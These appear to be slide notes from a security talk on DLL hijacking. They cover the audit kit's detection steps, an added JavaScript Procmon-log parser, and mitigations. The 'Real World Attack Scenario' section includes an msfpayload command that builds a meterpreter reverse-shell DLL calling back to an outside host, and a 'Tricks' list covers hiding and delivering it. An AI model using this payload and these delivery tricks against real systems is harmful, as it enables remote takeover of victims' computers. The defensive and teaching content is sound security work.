How To Become a Hijacking Terrorist
DLL Hijacking for fun and profit

DLL Hijacking Overview
  • DLL Hijacking: trick a program into using a malicious DLL instead of the normal one
  • HDM found that when a file associated with a program is opened, the program looks in the file's local path for the DLLs it references before looking in the correct location alongside the associated executable

PCAP Example - Normal

PCAP Example - Hijacked

DLL Hijacking
  • Old trick, new dog
  • Linux removed “.” from $PATH
  • Client side, WebDAV, or remote SMB share
  • Widely exploitable
  • Easy to detect

DLLHijackAuditKit
  • Automates the detection
  • Generates test scenarios for each file extension and automatically creates an exploitable file
  • Searches every extension

Demo

Audit.js
  • Download procmon from Sysinternals
  • Opens procmon and filters for operations that begin with "IRP_MJ_" or "FASTIO_"
  • Uses WMI to query the local system and find all the file extensions it can handle
  • Generates a test case for each file extension: a dummy file containing the word “Howdy…”, named after the extension being tested
  • Automatically opens each file from the command line
  • While the file is open, logs file system activity in procmon
  • Waits a few seconds, then closes the program and tries the next file
  • When all extensions are done, save the procmon capture as LogFile.csv. This log file holds the executable that handled each opened file and the path where it tried to look for a DLL.

Analyze.js
  • Parses LogFile.csv for each executable and the DLL it was looking for (e.g. wireshark.exe and airpcap.dll)
  • Generates test scenarios and copies in a dummy DLL named after the real DLL the executable is looking for
  • Runs the file again; if the dummy DLL is loaded, it creates a text file named exploit.txt
  • Repeat for each EXE and DLL pair to verify which are actively exploitable

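As an added example that is not code from the audit kit or the deck: the detection logic behind the Audit.js and Analyze.js steps, run over a constructed Procmon CSV export, listing the (executable, DLL) pairs that probed the opened document's directory and did not find the DLL there. It assumes Procmon's default CSV columns and a hypothetical document directory C:\Users\hdm\Downloads.

```javascript
// Added example (not the DLLHijackAuditKit's own code): scan a Process Monitor
// CSV export, like the LogFile.csv the audit step saves, for DLLs that a process
// probed in the opened document's directory and did not find there. Such an
// (exe, dll) pair is what the Analyze.js step goes on to verify with a dummy DLL.

// Constructed sample log; the column layout is Procmon's default CSV export.
const SAMPLE_LOG = [
  '"Time of Day","Process Name","PID","Operation","Path","Result","Detail"',
  '"1:02:03.1","wireshark.exe","1234","CreateFile","C:\\Users\\hdm\\Downloads\\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"',
  '"1:02:03.2","wireshark.exe","1234","CreateFile","C:\\Program Files\\Wireshark\\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"',
  '"1:02:03.3","wireshark.exe","1234","CreateFile","C:\\Users\\hdm\\Downloads\\capture.pcap","SUCCESS","Desired Access: Generic Read"',
  '"1:02:03.4","wireshark.exe","1234","CreateFile","C:\\Program Files\\Wireshark\\libwsutil.dll","SUCCESS","Desired Access: Read Attributes"',
  '"1:02:03.5","notepad.exe","2222","CreateFile","C:\\Windows\\System32\\version.dll","SUCCESS","Desired Access: Read Attributes"',
].join("\n");

// Procmon quotes every field, so stripping the outer quotes and splitting on
// '","' is enough; a full CSV parser is not needed for this export format.
function parseProcmonCsv(text) {
  const lines = text.split(/\r?\n/).filter((l) => l.length > 0);
  const header = lines[0].slice(1, -1).split('","');
  return lines.slice(1).map((line) => {
    const fields = line.slice(1, -1).split('","');
    return Object.fromEntries(header.map((h, i) => [h, fields[i]]));
  });
}

// Return the distinct (process, dll) pairs where a DLL lookup hit the document
// directory (docDir) and failed: a DLL dropped there would be loaded instead of
// the real one. Comparison is case-insensitive, as Windows paths are.
function findHijackCandidates(csvText, docDir) {
  const wanted = docDir.replace(/\\+$/, "").toLowerCase();
  const seen = new Set();
  const found = [];
  for (const row of parseProcmonCsv(csvText)) {
    if (row.Operation !== "CreateFile" || row.Result !== "NAME NOT FOUND") continue;
    const cut = row.Path.lastIndexOf("\\");
    const dir = row.Path.slice(0, cut).toLowerCase();
    const file = row.Path.slice(cut + 1);
    if (dir !== wanted || !/\.dll$/i.test(file)) continue;
    const key = `${row["Process Name"].toLowerCase()}|${file.toLowerCase()}`;
    if (seen.has(key)) continue;
    seen.add(key);
    found.push({ process: row["Process Name"], dll: file });
  }
  return found;
}

// Usage: node this_file.js -> prints the pairs to re-test with a dummy DLL
console.log(findHijackCandidates(SAMPLE_LOG, "C:\\Users\\hdm\\Downloads"));
```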

Real World Attack Scenario
  • Generate payload: msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll
  • Rename it to the DLL that the EXE is looking for
  • Put the DLL in the same folder as a file with an associated extension
  • Deliver the file and the DLL

Tricks
  • Use the Hidden attribute
  • Obfuscate with lots of other files
  • MSFEncode the payload
  • Create a link to a subfolder
  • Road Apples
  • Host an SMB share on the net!
  • Create a WebDAV share

Mitigation
  • Admins:
    • Microsoft tool to catch illegal DLL references: http://support.microsoft.com/kb/2264107
    • CWDIllegalInDllSearch registry value
    • Disable WebDAV
    • Disable outbound SMB (ports 139, 445)
  • Developers:
    • Load DLLs securely

References
  • http://www.microsoft.com/technet/security/advisory/2269637.mspx
  • http://blog.metasploit.com/2010/08/better-faster-stronger.html

0day (AFAIK)
  • RDP .dll
